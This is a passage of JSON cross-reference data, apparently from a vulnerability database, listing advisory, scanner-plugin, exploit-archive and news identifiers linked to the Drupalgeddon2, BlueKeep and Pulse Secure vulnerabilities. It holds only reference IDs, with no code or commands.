"MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201995234", "MYHACK58:62201995523", "MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["700224.PRM", "700228.PRM", "700229.PRM", "700230.PRM", "701262.PRM", "7286.PASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "DEBIAN_DLA-1325.NASL", "DEBIAN_DSA-4156.NASL", "DRUPAL_8_5_1.NASL", "DRUPAL_CVE-2018-7600_RCE.NBIN", "FEDORA_2018-906BA26B4D.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "MSRDP_CVE-2019-0708.NBIN", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "SMB_NT_MS19_FEB_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS19_MAR_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS19_MAY_4499149.NASL", "SMB_NT_MS19_MAY_4499164.NASL", "SMB_NT_MS19_MAY_XP_2003.NASL", "WEB_APPLICATION_SCANNING_112365", "WEB_APPLICATION_SCANNING_112366", "WEB_APPLICATION_SCANNING_112367", "WEB_APPLICATION_SCANNING_112368", "WEB_APPLICATION_SCANNING_98216", "WEB_APPLICATION_SCANNING_98564", "WEB_APPLICATION_SCANNING_98565", "WEB_APPLICATION_SCANNING_98566", "WEB_APPLICATION_SCANNING_98567", "WEB_APPLICATION_SCANNING_98568", "WEB_APPLICATION_SCANNING_98569", "WEB_APPLICATION_SCANNING_98570"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108438", "OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310141028", "OPENVAS:1361412562310141029", "OPENVAS:1361412562310704156", "OPENVAS:1361412562310812583", "OPENVAS:1361412562310812584", "OPENVAS:1361412562310814523", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310876320", "OPENVAS:1361412562310891325"]}, {"type": "osv", "idList": ["OSV:DLA-1325-1", "OSV:DSA-4156-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154176", "PACKETSTORM:154579", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:162960"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "saint", "idList": ["SAINT:17FB524069BA3CD18537B30C76190BF7", "SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:67BEB8C11AAB63038EBD6BD535D548D7", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:97207"]}, {"type": "symantec", "idList": ["SMNTC-106914", "SMNTC-108273", "SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", "TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66", "TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78", "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:AB5E63755953149993334997F5123794", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:CFBFA4A360F5A4B96A4245B783BAE4C2", "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650", "TALOSBLOG:E7EA34380482751C5595EDE9DA228FA0", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1BA2E3EE721856ECEE43B825656909B0", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4DE731C9D113C3993C96A773C079023F", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:7FD924637D99697D78D53283817508DA", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:D0592A04885C26716DF385AE8ABF8401", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F8EDB5227B5DA0E4B49064C2972A193D"]}, {"type": "threatpost", "idList": ["THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:157F244C629A1657480AFA561FF77BE4", "THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "THREATPOST:29D66B3C46A57CA3A0E13D7361812077", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:3D0ED9A884FBC4412C79F4B5FF005376", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:88C99763683E42B94F1E7D307C0D9904", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:90739FC29BE2A68C72AAA4B88DB9A420", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:E3C3B5620EF807FF799CC5A969324BF2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-7600"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-32826", "1337DAY-ID-32978", "1337DAY-ID-33140", "1337DAY-ID-33275", "1337DAY-ID-33565", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33951", "1337DAY-ID-36351"]}]}, "score": {"value": 1.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201804-1"]}, {"type": "attackerkb", "idList": ["AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D"]}, {"type": "canvas", "idList": ["BLUEKEEP", "NETSCALER_TRAVERSAL_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672"]}, {"type": "cert", "idList": ["VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0192", "CPAI-2018-1697", "CPAI-2019-0392", "CPAI-2019-0657", "CPAI-2019-1097", "CPAI-2019-1653"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:A5265FFF4C417EB767D82231D2D604B8"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2018-7600", "CVE-2019-0708", "CVE-2019-11510"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:E895C", "DEBIAN:DSA-4156-1:C1814"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-638", "E-639", "E-688"]}, {"type": "exploitdb", "idList": ["EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:46904", "EDB-ID:47297", "EDB-ID:47416"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:643750D6FF631053256ACECA930FF041"]}, {"type": "f5", "idList": ["F5:K22854260", "F5:K25238311"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:45D79604B015", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:BFB36D22F20651C632D25AA20588E904"]}, {"type": "freebsd", "idList": ["A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "19F70587-89FB-5855-A578-0E55C3510C59", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "31DB22CD-3492-524F-9D26-035FC1086A71", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "38A11E23-686C-5C12-93FA-4A82D0E04202", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "462438E9-2947-5006-9134-9BA0BCC1B262", "46FA259E-5429-580C-B1D5-D1F09EB90023", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "523F993F-2487-5C75-A910-22605D6D57D9", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "560405C4-4806-5173-B662-F9C3D776D8D4", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "6787DC40-24C2-5626-B213-399038EFB0E9", "721C46F4-C390-5D23-B358-3D4B22959428", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "851959DE-3B5C-5317-868E-5D80E801E3B0", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9D170C46-A745-5692-BA84-67EBFEA037FF", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A839FA86-0873-592C-AA31-2C445B4C4F29", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BE90B1DD-521D-540C-8554-5454779256A5", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "hackerone", "idList": ["H1:591295"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1"]}, {"type": "kaspersky", "idList": ["KLA11417", "KLA11706"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4482238198881011483", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:C93CCA23099AC250E702848B49677D5B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:EXPLOIT/UNIX/WEBAPP/DRUPAL_DRUPALGEDDON2", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0604", "MS:CVE-2019-0708"]}, {"type": "mskb", "idList": ["KB4462143"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "mssecure", "idList": ["MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201995523", "MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1325.NASL", "DEBIAN_DSA-4156.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310704156", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310876320", "OPENVAS:1361412562310891325"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:153133", "PACKETSTORM:154176", "PACKETSTORM:154579"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1"]}, {"type": "saint", "idList": ["SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "securelist", "idList": 